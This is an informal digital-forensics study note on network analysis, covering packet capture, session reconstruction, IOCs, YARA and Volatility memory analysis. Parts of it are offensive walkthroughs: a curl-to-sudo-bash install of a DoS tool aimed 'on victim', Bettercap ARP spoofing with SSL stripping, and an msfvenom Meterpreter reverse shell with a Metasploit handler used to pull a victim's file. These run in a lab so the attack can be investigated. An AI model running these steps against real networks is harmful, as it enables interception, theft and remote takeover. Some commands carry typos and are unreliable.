Part 3:Use case Network Analysis

 

Use Cases

 

Network Analysis

1.    Network traffic investigations

 

Digital forensics involves the collection, analysis, and preservation of electronic evidence for use in legal proceedings. Network analysis is a crucial aspect of digital forensics and involves examining network traffic to identify any unauthorized access or activity on a network.

 

Network analysis can be used to identify the source and destination of network traffic, the type of traffic, and the amount of data transferred. This information can be used to determine if any unauthorized access has occurred, whether data has been stolen or tampered with, or if any malware or other malicious software has been installed on the network.

 

There are several tools and techniques used in network analysis for digital forensics. Some of the most common include:

 

1.     Packet sniffing: This involves capturing and analyzing individual packets of data as they are transmitted over a network. Packet sniffers can be used to identify the source and destination of network traffic, the type of traffic, and the amount of data transferred.

 

1.1.    Choose a packet sniffing tool: There are many packet sniffing tools available, such as Wireshark, tcpdump, and Microsoft Network Monitor. Choose a tool that is appropriate for your needs and familiarize yourself with its features.

 

1.2.    Set up the network interface: Connect the computer to the network interface that you want to monitor. You may need to configure the network interface to ensure that it is operating correctly.

 

1.3.    Start the packet sniffing tool: Start the packet sniffing tool and configure it to capture the network traffic on the desired network interface. You may need to specify filters to capture specific types of traffic.

 

1.4.    Capture network traffic: Begin capturing network traffic by starting the capture process. The packet sniffing tool will record all network traffic that flows through the network interface.

 

1.5.    Analyze captured packets: Once you have captured network traffic, you can analyze it using the packet sniffing tool. Look for patterns or anomalies in the traffic that may indicate malicious activity or other issues.

 

1.6.    Document your findings: Document your findings in a detailed report that includes information on the packet sniffing tool used, the network interface monitored, and the network traffic captured and analyzed.

 

2.     Protocol analysis: This involves analyzing the protocols used by different network devices to communicate with each other. By analyzing these protocols, forensic analysts can identify any unauthorized or unusual activity on the network.

 

2.1   Capturing network traffic: The first step in protocol analysis is to capture the network traffic between the devices on the network. This can be done using network sniffers or packet capture tools that capture and store all of the packets that are transmitted over the network.

 

2.2   Filtering packets: Once the packets have been captured, investigators can use filters to narrow down the packets to only those that are relevant to the investigation. For example, they may filter based on source and destination IP addresses, port numbers, or other criteria. https://www.wireshark.org/docs/wsug_html/

 

2.3   Reconstructing sessions: Investigators can then reconstruct the network sessions between devices by piecing together the packets that were exchanged. This can help them understand the flow of data between devices and identify any anomalies or suspicious activity.

 

2.4   Analyzing packet content: Investigators can also analyze the content of the packets themselves to identify potential threats or security incidents. For example, they may look for malware signatures or other indicators of compromise that could help them identify the type of attack that was carried out.

 

 

In digital forensics, session reconstruction is the process of analyzing network traffic logs to identify and piece together user sessions. This is a critical part of protocol analysis, as it helps investigators understand the sequence of events that occurred during a cyber-attack or other digital crime.

 

Here are some steps that investigators can take to reconstruct sessions during protocol analysis:

 

2.4.1 Collect network traffic logs: Network traffic logs capture data on all network traffic that passes through a particular device or network. Collecting these logs is the first step in reconstructing sessions.

 

2.4.2 Identify sessions: Using the network traffic logs, investigators can identify sessions by looking for patterns in the data that indicate user activity. For example, a session may be identified by a series of HTTP requests from a particular IP address.

·        IP Address: Sessions can be identified by looking for patterns in the data that indicate user activity. For example, a session may be identified by a series of requests from a particular IP address.

·        Timestamps: Sessions can also be identified by analyzing timestamps in network traffic logs. A session may be identified as a series of requests that occur within a certain time frame.

·        User Agent: User agent information can be used to identify sessions. A user agent is a string of text that identifies the web browser or application being used to access a website or network. By analyzing user agent information, investigators can identify sessions associated with a particular browser or application.

·        Session Cookies: Session cookies are small text files that are used to store user session information. By analyzing session cookie data, investigators can identify sessions associated with a particular user or device.

·        Protocol Analysis: Protocol analysis involves analyzing network traffic logs to identify patterns in the data that indicate user activity. This can be used to identify sessions based on the types of requests being made and the responses received.

 

 

 

2.4.3 Reconstruct sessions: Once sessions have been identified, investigators can reconstruct them by piecing together the data from the network traffic logs. This can include information on the types of requests made, the responses received, and any data that was transmitted during the session.

 

Reconstructing sessions is the process of piecing together the data from network traffic logs to recreate a user's activity on a website or application. Here are some techniques that can be used to reconstruct sessions:

 

·        Session Identification: Before reconstructing a session, it must first be identified. This can be done using the techniques mentioned in the previous answer.

·        Session Reconstruction: Once a session has been identified, the data from network traffic logs can be used to reconstruct the session. This can involve analyzing the types of requests made, the responses received, and any data that was transmitted during the session.

·        Timeline Analysis: Timeline analysis involves piecing together reconstructed sessions in the order in which they occurred. This can help investigators understand the sequence of events leading up to a cyber-attack or other digital crime.

·        Correlation Analysis: Correlation analysis involves comparing reconstructed sessions from different sources to identify patterns and correlations in the data. This can help investigators identify connections between different users, devices, or events.

 

·        Data Visualization: Data visualization tools can be used to help investigators visualize reconstructed sessions and other data from network traffic logs. This can help identify patterns and anomalies that may be difficult to spot through manual analysis.

 

Overall, reconstructing sessions is a critical part of digital investigations, as it allows investigators to understand the sequence of events leading up to a cyber-attack or other digital crime. By piecing together data from network traffic logs, investigators can identify patterns and correlations in the data that may be difficult to spot through other means

 

 

 

2.4.4 Analyze reconstructed sessions: Once sessions have been reconstructed, investigators can analyze the data to better understand the sequence of events that occurred during the attack or digital crime. This can help them identify the source of the attack, the methods used by the attacker, and the data that was compromised.

 

Analyzing reconstructed sessions is an important step in digital investigations, as it allows investigators to gain insight into the sequence of events that occurred during a cyber-attack or other digital crime. Here are some techniques that can be used to analyze reconstructed sessions:

 

·        Timeline Analysis: Timeline analysis involves organizing reconstructed sessions in chronological order to identify the sequence of events leading up to a cyber-attack or other digital crime. This can help investigators identify the source of the attack and the methods used by the attacker.

·        Pattern Analysis: Pattern analysis involves looking for patterns in the data that indicate a particular type of activity. For example, an attacker may use a specific set of commands or tools during a cyber-attack. By identifying these patterns, investigators can gain insight into the attacker's methods and motivations.

·        Correlation Analysis: Correlation analysis involves comparing reconstructed sessions from different sources to identify connections between users, devices, or events. This can help investigators identify relationships between different parts of a cyber-attack or other digital crime.

·        Keyword Analysis: Keyword analysis involves searching reconstructed sessions for specific keywords or phrases that may be relevant to the investigation. For example, an investigator may search for the name of a particular tool or malware used by the attacker.

·        Statistical Analysis: Statistical analysis involves using statistical techniques to identify patterns in the data. This can help investigators identify trends and anomalies that may be difficult to spot through other means.

 

Overall, analyzing reconstructed sessions is a critical part of digital investigations, as it allows investigators to gain insight into the methods, motivations, and sequence of events leading up to a cyber-attack or other digital crime. By using a combination of techniques, investigators can identify patterns and correlations in the data that can help them solve complex digital crimes.

 

 

3.     Network flow analysis: This involves analyzing the flow of data between different network devices. By analyzing this flow, forensic analysts can identify any unusual patterns or behaviors that may indicate unauthorized access or activity.

 

·        Digital forensics involves the preservation, analysis, and presentation of electronic data to reconstruct past events or activities. Network flow analysis is a subfield of digital forensics that involves the examination of network traffic to identify patterns, anomalies, and evidence of unauthorized or malicious activity.

 

·        Network flow analysis involves capturing and analyzing data packets transmitted over a network, such as the internet or a local area network (LAN). This data can include information about the source and destination of the packet, the time it was sent, and the type of data transmitted. Network flow analysis can be used to identify network vulnerabilities, detect attacks or intrusions, and gather evidence for legal proceedings.

 

·        The process of network flow analysis involves several steps, including data collection, analysis, and interpretation. Tools such as packet capture software, intrusion detection systems, and network traffic analyzers are used to capture and analyze network traffic data. Once the data has been collected, it can be analyzed using various techniques, such as statistical analysis, pattern recognition, and machine learning algorithms.

 

 

There are several types of network traffic analyzers, including:

 

·        Packet capture tools: These tools capture individual packets of data as they travel across a network, allowing for in-depth analysis of packet headers and contents.

Example: Wireshark: Wireshark is a widely used open-source packet capture and analysis tool. It supports a wide range of protocols and provides detailed packet-level analysis. Tcpdump: Tcpdump is a command-line packet capture tool that runs on various operating systems, including Linux and macOS. It can capture packets in real-time or from stored data files and provides filtering and analysis capabilities.

 

 

·        Network performance monitoring tools: These tools monitor network traffic to identify and troubleshoot network performance issues, such as slow response times, packet loss, and bandwidth utilization.

Example:  Wireshark , Paessler Router Traffic Grapher (PRTG): PRTG is a network monitoring tool that can monitor traffic, applications, and devices in real-time, Microsoft Network Monitor,

 

·        Protocol analyzers: These tools decode and analyze network protocols, such as TCP/IP, HTTP, and SMTP, to identify potential security vulnerabilities and troubleshoot network issues.

 

·        Intrusion detection/prevention systems: These tools monitor network traffic for signs of malicious activity, such as viruses, malware, and unauthorized access attempts.

 

 

4.     Network mapping: This involves creating a map of the network infrastructure, including all connected devices, routers, switches, and servers. By mapping the network, forensic analysts can identify any potential vulnerabilities or weaknesses that may have been exploited by an attacker.

 

Network mapping tools can be used to identify the devices, protocols, and services that are running on a network, as well as the relationships between them. This information can be used to identify potential vulnerabilities, misconfigurations, and other issues that could pose a threat to the security and integrity of the network.

 

Some common network mapping tools used in digital forensics include:

 

·        Nmap: This is a popular open-source tool that can be used to scan networks and identify hosts, services, and operating systems.

 

·        Wireshark: This is a network protocol analyzer that can be used to capture and analyze network traffic in real-time.

 

·        Netstat: This is a command-line tool that can be used to display active network connections, open ports, and other network-related information.

 

·        Nessus: This is a vulnerability scanner that can be used to identify potential security weaknesses in a network.

 

·        Fping: This is a ping utility that can be used to quickly scan a network and identify active hosts.

 

Overall, network mapping tools are an important part of the digital forensics toolkit and can be used to help investigators identify potential sources of evidence and analyze the overall security posture of a network.

 

 

In summary, network analysis is a crucial aspect of digital forensics that involves examining network traffic to identify any unauthorized access or activity on a network. There are several tools and techniques used in network analysis, including packet sniffing, protocol analysis, network flow analysis, and network mapping.

 

 

Scenario: A company's network has been breached and sensitive information has been stolen. The IT department has identified the IP address of the suspected attacker and provided it to the digital forensics team for analysis.

 

Steps for Network Analysis:

 

Identify the network traffic associated with the IP address: The digital forensics team can use network traffic analysis tools such as Wireshark or tcpdump to capture and analyze the network traffic associated with the IP address of the attacker.

Tcpdump:

put a network interface into promiscuous mode , we can capture all traffic for Gateway , to examine if eth0 in  promiscuous mode , ifconfig , we see Proc flag.

In order to capture network traffic from other computers on the network using Wireshark, you will need to be connected to a hub, a switch in "monitor" mode, or use ARP poisoning to redirect traffic to your machine. Here are the general steps to capture network traffic from other computers using Wireshark:

// for the wireless https://www.youtube.com/watch?v=Hl0IpoS503A

 

 

 

$ sudo ifconfig eth0 promisc

 

sudo tcpdump host 192.168.0.1 this will capture traffic from my host to remote host

or

sudo tcpdump net 192.168.0.0/24

 

Or can run Wireshark , to start capture of remote host on local network use ARP Spoofing Using Ettercap , and open Wireshark to see sniffing traffic

 

https://www.youtube.com/watch?v=r0l_54thSYU

 

 

 

Examine the packets: The team can examine the packets captured to identify any suspicious traffic, such as data exfiltration attempts or unauthorized access attempts.

·        Capture the network traffic: Start capturing the network traffic using a tool like Wireshark or tcpdump. You can capture traffic on a specific network interface, or you can capture traffic between specific hosts or over specific protocols.

 

·        Filter the traffic: Once you have captured the traffic, filter the packets to focus on the traffic of interest. For example, you can filter packets based on IP address, protocol, port number, or other criteria.

 

·        Analyze the packets: Once you have filtered the packets, analyze them in detail to identify any suspicious activity. Look for anomalies in the traffic, such as unusual packet sizes, protocol violations, or unexpected traffic patterns.

 

·        Reconstruct the sessions: In some cases, it may be necessary to reconstruct the sessions to get a more complete picture of the network activity. This involves analyzing the packets in sequence to identify the different stages of the session.

 

·        Document your findings: As you analyze the packets, document your findings in detail. Take screenshots of relevant packets and highlight any suspicious activity. Be sure to document the time, date, and location of the activity, as well as any other relevant information.

 

·        Draw conclusions: Once you have analyzed the packets and documented your findings, draw conclusions about the network activity. Identify any security threats or breaches, and recommend steps to mitigate the risk.

 

 

 

Determine the type of attack: Based on the traffic analysis, the team can determine the type of attack used by the attacker, whether it was a brute-force attack, SQL injection, or another type of attack.

 

·        Determining the type of attack based on traffic analysis can be challenging, as different types of attacks can produce similar traffic patterns. However, here are some common types of attacks and the traffic patterns they may produce:

 

·        Denial-of-service (DoS) attack: A DoS attack floods a network or system with traffic, causing it to become unavailable. The traffic pattern for a DoS attack may show a high volume of traffic from multiple sources to a single target, often using a particular protocol or port.

 

1.       Install Raven-Storm on Linux.

2.  curl -s https://raw.githubusercontent.com/Taguar258/Raven-Storm/master/install.sh | sudo bash -s

3.       https://www.youtube.com/watch?v=wsAtq28V0JU

4.       On victim

 

 

·        Distributed denial-of-service (DDoS) attack: A DDoS attack is similar to a DoS attack, but it uses a botnet of compromised devices to flood the target with traffic. The traffic pattern for a DDoS attack may show traffic from multiple sources to a single target, often with a high volume of traffic and a large number of packets per second.

 

·        Man-in-the-middle (MitM) attack: A MitM attack intercepts and alters traffic between two parties, allowing the attacker to eavesdrop or modify the communication. The traffic pattern for a MitM attack may show traffic between two parties with an additional party intercepting and possibly modifying the traffic.

 

·        Spoofing attack: A spoofing attack involves an attacker forging or disguising their identity or the source of their traffic. The traffic pattern for a spoofing attack may show traffic with a falsified source IP address or other identifying information.

 

 

ARP Poisoning  How ARP Poisoning Works // Man-in-the-Middle - YouTube

-        Its use MAC address : arp -a

-        In arp poisoning I’m telling the victim that I’m  the gateway, telling the gateway I’m the victim

-         sysctl net.ipv4_forward-1   : this command allow attacker to forward traffic from victim to gateway

-          cat /proc/sys/net/ipv4/ip_forward    Linux IP forwarding - How to Disable/Enable using net.ipv4.ip_forward (linuxconfig.org)

-        Now we can capture all http traffic using wireshark

 

-        ssl intercept  Man-in-the-Middle Attack

-         

Using Bettercap tool Capturing Network Traffic with Bettercap - HTTP/HTTPS - YouTube

 

 

1.       sysctl net.ipv4_forward-1  

2.       sudo apt install bettercap

3.       bettercap

4.       caplets.update

5.       help

6.       net.probe on

7.       net.show

8.       set arp.spoof.fullduplex true

9.       set arp.spoof.target 192.168.7.1 (victim IP)

10.    set http.proxy.sslstrip true

11.    create file.pcap

12.    net.sniff on

13.    set net.sniff.output /home/sansforensics/Desktop/cases/hi.pcap

14.    set http.proxy.sslstrip true

15.    net.sniff on

 

SSL Taking over HTTPS traffic with BETTERCAP using SSLSTRIP and explaining HSTSHijack - testing MiTM - YouTube

We can use this to check ssl install correctly

16.    set http.proxy.sslstrip true

17.    hstshijack/hstshijack

18.    arp.spoof true

19.    net.sniff true

20.    net.probe true

now send link to vicitme without https or when victim browse web site its start without https !!!

 

 

 

 

 

·        Phishing attack: A phishing attack uses social engineering to trick a user into divulging sensitive information. The traffic pattern for a phishing attack may show traffic to a fake login page or other spoofed website, often with a high volume of traffic from a single source

 

Phishing attacks are a type of cyberattack in which an attacker sends fraudulent emails, text messages, or other forms of communication to trick recipients into providing sensitive information such as passwords, credit card numbers, or other personal data. Digital forensics can be used to investigate and respond to phishing attacks.

 

When investigating a phishing attack, digital forensics experts can analyze the phishing email or other communication to determine its origin and any clues about the attacker's identity. They can also examine any attachments or links included in the email to identify any malware that may have been downloaded onto the victim's computer or network.

 

In addition, digital forensics experts can track any communications or financial transactions that may have resulted from the phishing attack, such as unauthorized purchases or money transfers. They can also investigate any related data breaches that may have occurred as a result of the attack.

 

To prevent phishing attacks, digital forensics experts can conduct security audits and risk assessments to identify vulnerabilities in an organization's systems and processes. They can also train employees to recognize and report phishing attempts and implement security measures such as multi-factor authentication and email filtering to reduce the risk of successful attacks.

 

an example scenario of a phishing attack and how digital forensics can be used to investigate it:

A company employee receives an email that appears to be from their bank, asking them to click on a link to confirm their account details.

 

1.       The employee clicks on the link and enters their login credentials.

 

2.       Shortly thereafter, the employee notices suspicious activity on their bank account, including unauthorized transactions.

 

3.       The company's IT department is notified and calls in digital forensics experts to investigate the incident.

 

4.       The digital forensics team collects data from the employee's computer, including email headers, browser history, and any downloaded files or attachments.

 

5.       The email header information is analyzed to determine the sender's IP address and other metadata.

 

6.       The link that the employee clicked on is examined to determine if it led to a legitimate website or a phishing page.

 

7.       The employee's computer is scanned for malware or other indicators of a security breach.

 

8.       The digital forensics team traces the unauthorized transactions on the employee's bank account and identifies any other related incidents.

 

9.       Based on the evidence collected, the digital forensics team identifies the source of the phishing attack and any accomplices involved.

 

10.    The company takes steps to mitigate the damage caused by the attack, such as freezing the affected bank account and changing the employee's login credentials.

 

11.    The company implements new security measures, such as email filtering and employee training, to prevent future phishing attacks.

 

 

 

 

 

 

 

·        Note that these are just a few examples of common attack types, and that the traffic patterns for each type can vary depending on the specific attack and the attacker's techniques. It is important to use multiple indicators of compromise (IOCs) and analysis techniques to accurately identify the type of attack.

 

 

Determine the extent of the attack: The team can determine the extent of the attack by examining the traffic captured and identifying any other IP addresses that the attacker communicated with.

 

·        Determining the extent of an attack is an important part of digital forensics investigation. Here are some steps that can be taken to determine the extent of an attack:

 

·        Identify the initial point of entry: Digital forensics experts can trace the initial point of entry of the attack by examining logs, network traffic, and system files. This can help identify the vulnerability that was exploited to gain access to the system.

 

Identifying the initial point of entry is an important aspect of digital forensics investigation as it can help determine how the attack was carried out and the extent of the damage caused. Here are some steps that can be taken to identify the initial point of entry in a digital forensics investigation:

 

1.      Analyze logs: Digital forensics experts can analyze logs from various systems, including firewalls, intrusion detection systems, and servers to determine if any unusual activity was detected. This can provide information on the IP address or domain name that was used to initiate the attack.

 

2.      Check system files: Digital forensics experts can check system files, such as web server logs, application logs, and error logs, to identify any unusual activity that may have occurred. This can help identify the specific vulnerability or exploit that was used to gain access to the system.

 

3.      Interview witnesses: Digital forensics experts can interview witnesses to gain information on any unusual activity they may have observed, such as suspicious emails or pop-ups. This can help identify the initial point of entry and provide insights into the tactics used by the attacker.

 

4.      Analyze network traffic: Digital forensics experts can analyze network traffic to determine if any unusual or suspicious activity occurred. This can help identify the IP address or domain name that was used to initiate the attack and the type of attack that was carried out.

 

5.      Examine malware: If malware was used in the attack, digital forensics experts can examine the malware to determine how it was introduced into the system. This can help identify the initial point of entry and provide information on the specific vulnerability or exploit that was used.

 

By following these steps, digital forensics experts can identify the initial point of entry and gain insights into the tactics used by the attacker. This information can be used to strengthen the security posture of the system and prevent future attacks.

 

There are several digital forensics tools that can be used to identify the initial point of entry in an attack. Here are some examples:

 

·        Wireshark: Wireshark is a network protocol analyzer that can be used to capture and analyze network traffic. By examining network traffic, Wireshark can help identify the IP address or domain name that was used to initiate the attack.

 

·        Log analysis tools: There are many log analysis tools available that can be used to analyze logs from various systems, including firewalls, intrusion detection systems, and servers. These tools can help identify any unusual activity that may have occurred and provide information on the initial point of entry.

 

·        Memory analysis tools: Memory analysis tools can be used to examine the memory of a system to identify any suspicious processes or malware that may have been introduced into the system. This can help identify the initial point of entry and provide information on the specific vulnerability or exploit that was used.

 

·        Malware analysis tools: If malware was used in the attack, malware analysis tools can be used to examine the malware to determine how it was introduced into the system. This can help identify the initial point of entry and provide information on the specific vulnerability or exploit that was used.

 

·        Digital forensics suites: There are many digital forensics suites available that combine multiple tools and techniques to help identify the initial point of entry. Examples include EnCase, AccessData Forensic Toolkit, and FTK Imager.

 

 

 

 

·        Identify the scope of the attack: Once the point of entry is identified, digital forensics experts can analyze the extent of the damage caused by the attack. This can involve identifying the systems or data that have been compromised, the number of users affected, and the duration of the attack.

 

steps that can be taken to identify the scope of the attack in a digital forensics investigation:

 

1.      Determine the timeline of the attack: Digital forensics experts can analyze logs, system files, and other data sources to determine the timeline of the attack. This can help identify the specific systems or data that were compromised and the extent of the damage caused.

 

2.      Analyze the type of attack: Different types of attacks have different scopes. For example, a malware attack may compromise a single system, while a network-based attack may compromise multiple systems. By analyzing the type of attack, digital forensics experts can gain insights into the scope of the attack.

 

3.      Analyze the data that was accessed or stolen: If data was accessed or stolen in the attack, digital forensics experts can analyze the data to determine the scope of the attack. This can help identify the specific types of data that were compromised and the systems or applications that were affected.

 

4.      Interview witnesses and system owners: Digital forensics experts can interview witnesses and system owners to gain insights into the scope of the attack. This can help identify any systems or data that were compromised that may not have been detected through other means.

 

5.      Check for indicators of compromise: Indicators of compromise (IOCs) can provide insights into the scope of the attack. Digital forensics experts can analyze IOCs, such as IP addresses, domain names, and file hashes, to determine the extent of the damage caused

 

Indicators of compromise (IOCs) are pieces of evidence or artifacts that suggest that a security incident has occurred or is currently ongoing. IOCs can be used by security professionals to detect and respond to security incidents, as well as to prevent future attacks. Here are some examples of IOCs:

 

1.      IP addresses: IP addresses are a common type of IOC. They can be used to identify the source or destination of network traffic associated with a security incident. For example, if an attacker uses a specific IP address to launch a phishing attack, that IP address can be added to a blacklist to prevent future attacks.

 

2.      Domain names: Domain names can also be used as IOCs. Attackers may use domain names to host phishing sites or command and control servers used for malware. Identifying these domains can help block or take down the malicious infrastructure.

 

3.      File hashes: File hashes, such as MD5, SHA-1, and SHA-256, can be used to identify malware or other suspicious files. By comparing file hashes to known malware samples, security professionals can quickly determine if a file is malicious.

 

4.      Registry keys: Registry keys are settings within the Windows registry that can be used to configure system settings or run processes at startup. Attackers may create or modify registry keys to maintain persistence on a compromised system. Identifying these keys can help detect and remove malicious activity.

 

5.      Behavioral indicators: Behavioral indicators, such as unusual network traffic, process activity, or system events, can also be used as IOCs. For example, if a process attempts to connect to a command and control server or attempts to access sensitive data, that may be an indication of a security incident.

 

6.      By collecting and analyzing IOCs, security professionals can detect and respond to security incidents more quickly and effectively, reducing the impact of the incident and preventing future attacks.

 

 

 

 

 

·        Determine the nature of the attack: Digital forensics experts can analyze the attack vectors used to gain access to the system, such as phishing emails, malware, or social engineering. This can help identify the type of attack and the motivations behind it.

 

·        Collect and preserve evidence: Digital forensics experts must collect and preserve all relevant evidence related to the attack. This includes network logs, system files, emails, and any other data that may be relevant to the investigation.

 

·        Analyze the evidence: Once the evidence is collected, digital forensics experts can analyze it to determine the extent of the attack. This may involve identifying the perpetrators, their methods, and the impact of the attack on the system.

 

·        Report the findings: Digital forensics experts must report their findings to the relevant stakeholders, such as the company's management, IT staff, or law enforcement agencies. The report should include a detailed description of the extent of the attack, the damage caused, and recommendations for improving the security posture of the system.

 

·        By following these steps, digital forensics experts can determine the extent of an attack and provide recommendations for preventing future attacks

 

There are various tools that can be used to collect, analyze, and manage indicators of compromise (IOCs) in a security environment. Here are some examples:

 

·        Security Information and Event Management (SIEM) tools: SIEM tools, such as Splunk and IBM QRadar, can be used to collect and analyze log data from various sources, including network devices, servers, and applications. These tools can be configured to alert security teams when specific IOCs are detected, such as IP addresses, domain names, and file hashes.

 

·        Endpoint Detection and Response (EDR) tools: EDR tools, such as Carbon Black and Crowdstrike, are designed to detect and respond to advanced threats on endpoints, including servers, workstations, and mobile devices. These tools can collect IOCs, such as file hashes and process names, from endpoints and use machine learning to identify and respond to suspicious activity.

 

·        Threat Intelligence Platforms (TIPs): TIPs, such as ThreatConnect and Anomali, provide a centralized platform for managing and sharing IOCs across an organization. These tools can integrate with various security solutions, such as SIEM and EDR tools, to provide a comprehensive view of threats and enable faster incident response.

 

·        Open Source Tools: There are various open source tools available for collecting and analyzing IOCs, including YARA, a pattern matching tool for malware analysis, and MISP (Malware Information Sharing Platform), a threat intelligence sharing platform

 

 

YARA

YARA can be used for a wide range of malware-related tasks, including:

 

1.      Malware analysis: YARA can be used to analyze and identify malware samples based on their attributes, such as file names, file sizes, file hashes, and strings within the code.

 

2.      Threat intelligence: YARA can be used to create and share rules for specific malware families or threat actors to help other security professionals identify and respond to similar threats.

 

3.      Incident response: YARA can be used to quickly identify malware on a compromised system and provide a starting point for further analysis and remediation.

 

 

 

 

 

Identify the source of the attack: By analyzing the traffic, the digital forensics team can determine the source of the attack, whether it was a single individual or a group of individuals working together.

 

Collect evidence: The team can collect evidence of the attack, such as screenshots of suspicious traffic or log files, which can be used in legal proceedings.

 

Remediate the attack: Once the attack has been identified and evidence collected, the team can work with the IT department to remediate the attack and prevent future attacks.

 

By performing network analysis, the digital forensics team can identify the source of the attack, the extent of the attack, and collect evidence that can be used in legal proceedings. Additionally, network analysis can help prevent future attacks by identifying vulnerabilities in the network that can be addressed.

 

Before start analysis we need to understand the traffic flow

 

Tools: networkminer , wireshark

HowTo install NetworkMiner in Ubuntu Fedora and Arch Linux (netresec.com)

Save traffic from wireshark and open it in networkminer

 

·      Determine the type of attack: Based on the traffic analysis,

Practical Malware Analysis Essentials for Incident Responders - YouTube

 

 

 

 

 

 

 

 

Scenario

Let’s assume that machine A: the attacker create payload to machine V: the victim

 

We need:

1.    Preservation of Evidence

2.    Determine there is an attack using network analysis and find machine A IP

3.    Analyze the attack to find the infected process,Analyze memory for farther evidence

4.    Document the findings

5.    Presentation of Evidence

 

Solution:

 

1.    Preservation of Evidence:

1.1             $ md5sum 6666.exe

1.2           Or: $ sha256sum 6666.exe

1.3           $ sha256sum WIN-9DOREUOSU7I-20230308-200844.raw

 

2.    Collection of Evidence :Document the evidence: All evidence collected during the investigation should be properly documented, including where and when it was collected, who collected it, and any other relevant information.

 

 

3.    Analysis: We need to simulate the attack :

3.1           on machine A: kali create payload using msfvenom

sudo msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.170.129 lport=5555 -f exe -o /var/www/html/test/malware3.exe

3.2           start apache server: sudo service apatche2 start

 

3.3           wait Victim to lunch the payload: malware3.exe (we can send it using social engineering or email attached)

 

http://192.168.170.129/test

3.4           lunch Wireshark  as an administrator and start capturing  note abnormal traffic

                 http://192.168.170.129/test/

 

3.5           save taffic to log.txt after open malware.exe

3.6           start procmon save capture to log.csv //note the procdot folder for more information’s

3.7           on machine A: kali lunches Metasploit:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set Lhost 192.168.170.129

set lport 6666

exploit -j or run

session 1

Ø  mkdir helooooo

Ø  download cv.txt /home/kali

 

 

3.8           stop wireshark and procmon

3.9           export pack to txt or pecap and on procmon save to log.csv

 

3.10       open procdot add the log.txt or pecap and log.csv and select launcher for process we think its malicious then refresh

 

 

 

 

3.11     Check the malware with virus total

·      We need first to extract file from memory dump

 

$ vol.py -f /home/sansforensics/Desktop/WIN-9DOREUOSU7I-20230402-085644.raw --profile=Win8SP1x64_18340 psscan

 

The process ID : 3688

$ vol.py -f /home/sansforensics/Desktop/WIN-9DOREUOSU7I-20230402-085644.raw --profile=Win8SP1x64_18340 procdump -p 3688  --dump-dir=/home/sansforensics/Downloads/

 

 

 

Upload to virus total

 

 

 

Find if there is a process try to hide

$ vol.py -f /home/sansforensics/Desktop/WIN-9DOREUOSU7I-20230402-085644.raw --profile=Win8SP1x64_18340 psxview

 

 

4.    Documentation of Findings

4.1         from here we found that the Ip associated with  infected process 6666.exe is 192.168.170.129  which is the A IP

 

4.2         Memory Analyzes

1.      Dump memory using Dumpit or other applications and copy file to USB or share folder

2.      Open Ubuntu : $vol.py -f /home/sansforensics/Desktop/cases/WIN-9DOREUOSU7I-20230308-200844.raw --profile=Win8SP1x64_18340 pstree

List network connection $vol.py -f /home/sansforensics/Desktop/cases/WIN-9DOREUOSU7I-20230308-200844.raw --profile=Win8SP1x64_18340 netscan

From the SYN_SENT flag we know there is a file transfer  

Registry analysis

$vol.py -f /home/sansforensics/Desktop/cases/WIN-9DOREUOSU7I-20230308-200844.raw --profile=Win8SP1x64_18340 hivelist

 

 

5.      Presentation of Evidence